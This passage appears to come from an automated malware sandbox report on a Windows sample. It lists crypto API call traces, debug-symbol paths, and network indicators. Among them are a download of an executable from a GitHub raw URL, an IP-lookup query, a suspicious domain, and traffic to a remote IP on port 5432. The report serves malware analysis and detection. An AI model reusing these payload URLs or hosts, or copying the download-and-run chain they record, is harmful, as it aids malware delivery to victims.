Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33ABFA0 EVP_PKEY_CTX_new_from_pkey,ERR_new,ERR_set_debug,EVP_PKEY_decrypt_init,ERR_new,ERR_set_debug,EVP_PKEY_derive_set_peer,ERR_clear_error,ASN1_item_d2i,ASN1_TYPE_get,ERR_new,ERR_set_debug,EVP_PKEY_decrypt,ERR_new,EVP_PKEY_CTX_ctrl,ERR_new,ERR_new,ERR_set_debug,EVP_PKEY_CTX_free,ASN1_item_free,53_2_00007FFDA33ABFA0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA336FFD0 CRYPTO_clear_free,CRYPTO_free,CRYPTO_free,53_2_00007FFDA336FFD0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA332DF70 CRYPTO_malloc,BIO_snprintf,53_2_00007FFDA332DF70
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3329F90 CRYPTO_malloc,memset,memcpy,memcpy,CRYPTO_clear_free,CRYPTO_clear_free,CRYPTO_clear_free,CRYPTO_clear_free,OPENSSL_cleanse,53_2_00007FFDA3329F90
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA334A030 OSSL_PROVIDER_do_all,CRYPTO_free,CRYPTO_zalloc,OBJ_txt2nid,53_2_00007FFDA334A030
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3387FE0 ERR_new,ERR_set_debug,EVP_CIPHER_CTX_get0_cipher,EVP_CIPHER_get_flags,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_CIPHER_CTX_get0_cipher,EVP_MD_get_size,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_mark,ERR_clear_last_mark,ERR_pop_to_mark,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,ERR_clear_last_mark,ERR_new,ERR_set_debug,ERR_clear_last_mark,EVP_CIPHER_CTX_get0_cipher,CRYPTO_memcmp,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,53_2_00007FFDA3387FE0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA332BFF0 CRYPTO_THREAD_run_once,53_2_00007FFDA332BFF0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3362000 CRYPTO_free,53_2_00007FFDA3362000
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3360010 CRYPTO_zalloc,CRYPTO_strdup,CRYPTO_free,53_2_00007FFDA3360010
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA334DEA0 EVP_CIPHER_CTX_free,EVP_CIPHER_CTX_free,EVP_CIPHER_CTX_free,CRYPTO_zalloc,EVP_MAC_CTX_free,EVP_MAC_free,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MAC_free,EVP_CIPHER_CTX_new,EVP_CIPHER_fetch,OSSL_PARAM_construct_utf8_string,OSSL_PARAM_construct_end,EVP_DecryptInit_ex,EVP_CIPHER_free,EVP_CIPHER_free,EVP_CIPHER_free,EVP_MAC_CTX_get_mac_size,EVP_CIPHER_CTX_get_iv_length,EVP_MAC_final,CRYPTO_memcmp,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,memcpy,ERR_clear_error,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MAC_CTX_free,CRYPTO_free,53_2_00007FFDA334DEA0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3321EC0 CRYPTO_free,53_2_00007FFDA3321EC0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3377EC0 CRYPTO_zalloc,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,53_2_00007FFDA3377EC0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3359E60 OPENSSL_LH_free,OPENSSL_LH_free,OPENSSL_LH_free,CRYPTO_free,53_2_00007FFDA3359E60
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3361E70 CRYPTO_realloc,53_2_00007FFDA3361E70
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3395E80 CRYPTO_free,CRYPTO_strndup,CRYPTO_free,OPENSSL_cleanse,memcpy,EVP_MD_get0_name,EVP_MD_is_a,EVP_MD_get_size,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_cleanse,ERR_new,OPENSSL_cleanse,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,53_2_00007FFDA3395E80
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3387E90 CRYPTO_malloc,COMP_expand_block,53_2_00007FFDA3387E90
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3349F30 OSSL_PROVIDER_do_all,CRYPTO_malloc,memcpy,53_2_00007FFDA3349F30
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3391F30 CRYPTO_malloc,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,53_2_00007FFDA3391F30
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3343F00 CRYPTO_free,CRYPTO_strdup,53_2_00007FFDA3343F00
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3399DA6 CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,53_2_00007FFDA3399DA6
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3327DA0 CRYPTO_free,53_2_00007FFDA3327DA0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3325DB0 CRYPTO_malloc,53_2_00007FFDA3325DB0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA339BDB0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_is_a,ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,RAND_bytes_ex,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_encrypt_init,EVP_PKEY_encrypt,EVP_PKEY_encrypt,EVP_PKEY_CTX_free,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_clear_free,EVP_PKEY_CTX_free,53_2_00007FFDA339BDB0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA336BD60 CRYPTO_zalloc,53_2_00007FFDA336BD60
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3343D70 CRYPTO_zalloc,CRYPTO_new_ex_data,CRYPTO_free,53_2_00007FFDA3343D70
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3375E20 CRYPTO_zalloc,OSSL_ERR_STATE_new,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,53_2_00007FFDA3375E20
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3343E50 CRYPTO_free,CRYPTO_memdup,53_2_00007FFDA3343E50
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA338DDE0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,53_2_00007FFDA338DDE0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3349E00 CRYPTO_zalloc,EVP_MAC_fetch,EVP_MAC_CTX_new,EVP_MAC_free,EVP_MAC_CTX_free,EVP_MAC_free,CRYPTO_free,53_2_00007FFDA3349E00
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA332DE10 i2d_X509_NAME,memcmp,CRYPTO_free,CRYPTO_free,53_2_00007FFDA332DE10
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3373E10 CRYPTO_malloc,CRYPTO_free,53_2_00007FFDA3373E10
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3399CAA ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,EVP_MD_fetch,ERR_new,ERR_new,ERR_set_debug,EVP_MD_free,EVP_MD_get_size,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,EVP_MD_free,CRYPTO_free,53_2_00007FFDA3399CAA
Source: C:\Windows\System32\svchost.exe Code function: 53_2_00007FFDA335FCB0 CRYPTO_free,53_2_00007FFDA335FCB0
Source: C:\Windows\System32\svchost.exe Code function: 53_2_00007FFDA3349CC0 EVP_MAC_CTX_free,CRYPTO_free,53_2_00007FFDA3349CC0
Source: C:\Windows\System32\svchost.exe Code function: 53_2_00007FFDA3399CC1 EVP_MD_CTX_new,ERR_new,ERR_set_debug,EVP_MD_CTX_copy_ex,ERR_new,ERR_set_debug,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,memcpy,53_2_00007FFDA3399CC1
Source: C:\Windows\System32\svchost.exe Code function: 53_2_00007FFDA3391C70 CRYPTO_realloc,53_2_00007FFDA3391C70
Source: C:\Windows\System32\svchost.exe Code function: 53_2_00007FFDA338FC90 ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,memcmp,ERR_new,CRYPTO_memdup,ERR_new,ERR_new,ERR_set_debug,53_2_00007FFDA338FC90
Source: C:\Windows\System32\svchost.exe Code function: 53_2_00007FFDA3375D30 CRYPTO_free,53_2_00007FFDA3375D30
Source: C:\Windows\System32\svchost.exe Code function: 53_2_00007FFDA55CBA86 wcschr,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcschr,_wcsdup,CertOpenStore,GetLastError,free,free,free,free,CryptStringToBinaryW,free,CertFindCertificateInStore,free,calloc,CertFreeCertificateContext,CertCloseStore,free,fseek,ftell,fread,fclose,fseek,malloc,fclose,free,malloc,MultiByteToWideChar,PFXImportCertStore,free,free,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,strchr,strncmp,strncmp,strncmp,strncmp,strncmp,strtol,strchr,strncmp,strncmp,strncmp,strchr,CertFreeCertificateContext,free,free,53_2_00007FFDA55CBA86
Source: C:\Windows\System32\svchost.exe Code function: 53_2_00007FFDA559E580 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,53_2_00007FFDA559E580
Source: C:\Windows\System32\svchost.exe Code function: 53_2_00007FFDA559E570 CryptHashData,53_2_00007FFDA559E570
Source: C:\Windows\System32\svchost.exe Code function: 53_2_00007FFDA55AC4D0 memset,BCryptGenRandom,53_2_00007FFDA55AC4D0
Source: C:\Windows\System32\svchost.exe Code function: 53_2_00007FFDA55CB4E0 memset,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,53_2_00007FFDA55CB4E0
Source: C:\Windows\System32\svchost.exe Code function: 53_2_00007FFDA559E4F0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,53_2_00007FFDA559E4F0
Source: C:\Windows\System32\svchost.exe Code function: 53_2_00007FFDA55CE7A0 CertGetNameStringW,CertFindExtension,CryptDecodeObjectEx,53_2_00007FFDA55CE7A0
Source: C:\Windows\System32\svchost.exe Code function: 53_2_00007FFDA55B31A0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,53_2_00007FFDA55B31A0
Source: C:\Windows\System32\svchost.exe Code function: 53_2_00007FFDA5581180 CryptAcquireContextW,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,53_2_00007FFDA5581180
Source: C:\Windows\System32\svchost.exe Code function: 53_2_00007FFDA55B3090 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,53_2_00007FFDA55B3090
Source: C:\Windows\System32\svchost.exe Code function: 53_2_00007FFDA55B3110 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,53_2_00007FFDA55B3110
Source: C:\Windows\System32\console_zero.exe Code function: 59_2_00007FFDA559E580 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,59_2_00007FFDA559E580
Source: C:\Windows\System32\console_zero.exe Code function: 59_2_00007FFDA559E570 CryptHashData,59_2_00007FFDA559E570
Source: C:\Windows\System32\console_zero.exe Code function: 59_2_00007FFDA55AC4D0 memset,BCryptGenRandom,59_2_00007FFDA55AC4D0
Source: C:\Windows\System32\console_zero.exe Code function: 59_2_00007FFDA55CB4E0 memset,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,59_2_00007FFDA55CB4E0
Source: C:\Windows\System32\console_zero.exe Code function: 59_2_00007FFDA559E4F0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,59_2_00007FFDA559E4F0
Source: C:\Windows\System32\console_zero.exe Code function: 59_2_00007FFDA55CE7A0 CertGetNameStringW,CertFindExtension,CryptDecodeObjectEx,59_2_00007FFDA55CE7A0
Source: C:\Windows\System32\console_zero.exe Code function: 59_2_00007FFDA55B31A0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,59_2_00007FFDA55B31A0
Source: C:\Windows\System32\console_zero.exe Code function: 59_2_00007FFDA5581180 CryptAcquireContextW,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,59_2_00007FFDA5581180
Source: C:\Windows\System32\console_zero.exe Code function: 59_2_00007FFDA55B3090 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,59_2_00007FFDA55B3090
Source: C:\Windows\System32\console_zero.exe Code function: 59_2_00007FFDA55B3110 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,59_2_00007FFDA55B3110
Source: C:\Windows\System32\console_zero.exe Code function: 59_2_00007FFDA559E3C0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,59_2_00007FFDA559E3C0
Source: C:\Windows\System32\console_zero.exe Code function: 59_2_00007FFDA55CE270 memcmp,memcmp,CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError,59_2_00007FFDA55CE270
Source: C:\Windows\System32\console_zero.exe Code function: 59_2_00007FFDA55AC300 BCryptGenRandom,59_2_00007FFDA55AC300
Source: C:\Windows\System32\console_zero.exe Code function: 59_2_00007FFDA55CDE50 CertGetNameStringW,CertFindExtension,CryptDecodeObjectEx,free,CertFreeCertificateContext,59_2_00007FFDA55CDE50
Source: C:\Windows\System32\console_zero.exe Code function: 59_2_00007FFDA55CBA86 wcschr,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcschr,CertOpenStore,GetLastError,free,free,CryptStringToBinaryW,free,CertFindCertificateInStore,free,CertFreeCertificateContext,CertCloseStore,free,fseek,ftell,fread,fclose,fseek,fclose,MultiByteToWideChar,PFXImportCertStore,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,strchr,strncmp,strncmp,strncmp,strncmp,strncmp,strtol,strchr,strncmp,strncmp,strncmp,strchr,CertFreeCertificateContext,free,59_2_00007FFDA55CBA86
Source: pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_dead43ff-b
Source: C:\Windows\System32\console_zero.exe Code function: mov dword ptr [rbp+04h], 424D53FFh 59_2_00007FFDA55B4930
Source: unknown HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.6:63778 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.6:63784 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.6:63790 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.6:63793 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.6:63796 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.6:63799 version: TLS 1.2
Source: Ld0f3NDosJ.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Program Files\vcpkg\buildtrees\curl\x64-windows-rel\lib\libcurl.pdb source: pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, usvcinsta64.exe, 00000018.00000002.2514383144.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 0000003B.00000002.2613047508.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-15.7\Release\libpq\libpq.pdbGG source: pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: vcruntime140d.amd64.pdb source: pyld64.exe, 0000000E.00000000.2336381311.00007FF7FC91E000.00000002.00000001.01000000.00000006.sdmp, pyld64.exe, 0000000E.00000002.2442276535.00007FF7FC91E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, usvcinsta64.exe, 00000018.00000002.2514383144.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: vcruntime140d.amd64.pdb,,, source: pyld64.exe, 0000000E.00000000.2336381311.00007FF7FC91E000.00000002.00000001.01000000.00000006.sdmp, pyld64.exe, 0000000E.00000002.2442276535.00007FF7FC91E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, usvcinsta64.exe, 00000018.00000002.2514383144.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb## source: pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3363092235.00007FFDA553F000.00000002.00000001.01000000.00000011.sdmp, console_zero.exe, 0000003B.00000002.2612916762.00007FFDA553F000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libcrypto-3-x64.pdb source: pyld64.exe, 0000000E.00000000.2336381311.00007FF7FC91E000.00000002.00000001.01000000.00000006.sdmp, pyld64.exe, 0000000E.00000002.2442276535.00007FF7FC91E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, usvcinsta64.exe, 00000018.00000002.2514383144.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3362305807.00007FFD93B8B000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-15.7\Release\libpq\libpq.pdb source: pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\Release\libpq\libpq.pdb source: pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3362982850.00007FFDA3798000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\Release\libpq\libpq.pdbJJ source: pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3362982850.00007FFDA3798000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb source: pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3363092235.00007FFDA553F000.00000002.00000001.01000000.00000011.sdmp, console_zero.exe, 0000003B.00000002.2612916762.00007FFDA553F000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libssl-3-x64.pdb source: pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3362856525.00007FFDA33B0000.00000002.00000001.01000000.0000000E.sdmp
Source: Binary string: ucrtbased.pdb source: pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libssl-3-x64.pdb{{ source: pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3362856525.00007FFDA33B0000.00000002.00000001.01000000.0000000E.sdmp
Source: Binary string: PrintUI.pdb source: usvcinsta64.exe, 00000018.00000003.2501497770.0000025D7065E000.00000004.00000020.00020000.00000000.sdmp, printui.exe, 00000028.00000002.2603343739.00007FF68C622000.00000002.00000001.01000000.00000009.sdmp, printui.exe, 00000028.00000000.2502474138.00007FF68C622000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: PrintUI.pdbGCTL source: usvcinsta64.exe, 00000018.00000003.2501497770.0000025D7065E000.00000004.00000020.00020000.00000000.sdmp, printui.exe, 00000028.00000002.2603343739.00007FF68C622000.00000002.00000001.01000000.00000009.sdmp, printui.exe, 00000028.00000000.2502474138.00007FF68C622000.00000002.00000001.01000000.00000009.sdmp
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exe Code function: 3_2_00007FF646E58E3C GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,3_2_00007FF646E58E3C
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exe Code function: 3_2_00007FF646E58CF8 FindClose,FindFirstFileExW,GetLastError,3_2_00007FF646E58CF8
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exe Code function: 3_2_00007FF646E6D270 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_00007FF646E6D270
Source: C:\Windows\System32\console_zero.exe Code function: 59_2_00007FF6F8C70144 FindClose,FindFirstFileExW,GetLastError,59_2_00007FF6F8C70144
Source: C:\Windows\System32\console_zero.exe Code function: 59_2_00007FF6F8C701B8 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,59_2_00007FF6F8C701B8
Source: C:\Windows\System32\console_zero.exe Code function: 59_2_00007FF6F8C83764 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,59_2_00007FF6F8C83764
Source: C:\Windows\System32\crypti.exe Code function: 84_2_00007FF6D356D568 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,84_2_00007FF6D356D568
Source: C:\Windows\System32\crypti.exe Code function: 87_2_00007FF6EA96D568 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,87_2_00007FF6EA96D568
Source: global traffic TCP traffic: 192.168.2.6:63787 -> 38.180.213.183:5432
Source: Joe Sandbox View IP Address: 34.117.59.81
Source: Joe Sandbox View IP Address: 185.199.108.133
Source: Joe Sandbox View IP Address: 140.82.121.3
Source: Joe Sandbox View JA3 fingerprint: bd0bf25947d4a37404f0424edf4db9ad
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown DNS query: name: ipinfo.io
Source: global traffic HTTP traffic detected: GET /panchitopistolesx/items/main/hardsvcupdt.exe HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: raw.githubusercontent.com
    Connection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exe Code function: 3_2_00007FF646E566B0 GetCurrentDirectoryW,URLDownloadToFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,3_2_00007FF646E566B0
Source: global traffic DNS traffic detected: DNS query: tse1.mm.bing.net
Source: global traffic DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic DNS traffic detected: DNS query: ipinfo.io
Source: global traffic DNS traffic detected: DNS query: runvrs.com
Source: global traffic DNS traffic detected: DNS query: github.com
Source: pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3359501861.0000000064953000.00000008.00000001.01000000.00000012.sdmp String found in binary or memory: http://mingw-w64.sourceforge.net/X
Source: pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp, console_zero.exe, console_zero.exe, 0000003B.00000002.2612733960.00007FF6F8C8C000.00000002.00000001.01000000.00000014.sdmp, console_zero.exe, 0000003B.00000002.2612200244.000001D64B0CC000.00000004.00000020.00020000.00000000.sdmp, console_zero.exe, 0000003B.00000000.2583942814.00007FF6F8C8C000.00000002.00000001.01000000.00000014.sdmp String found in binary or memory: http://worldtimeapi.org/api/timezone/Etc/UTC
Source: pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp, console_zero.exe, 0000003B.00000002.2612733960.00007FF6F8C8C000.00000002.00000001.01000000.00000014.sdmp, console_zero.exe, 0000003B.00000000.2583942814.00007FF6F8C8C000.00000002.00000001.01000000.00000014.sdmp String found in binary or memory: http://worldtimeapi.org/api/timezone/Etc/UTCapplication/octet-streamtext/plain;
Source: pyld64.exe, 0000000E.00000000.2336381311.00007FF7FC91E000.00000002.00000001.01000000.00000006.sdmp, pyld64.exe, 0000000E.00000002.2442276535.00007FF7FC91E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, usvcinsta64.exe, 00000018.00000002.2514383144.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3360185514.00000000682A4000.00000008.00000001.01000000.0000000F.sdmp String found in binary or memory: http://www.gnu.org/licenses/
Source: svchost.exe String found in binary or memory: http://www.zlib.net/
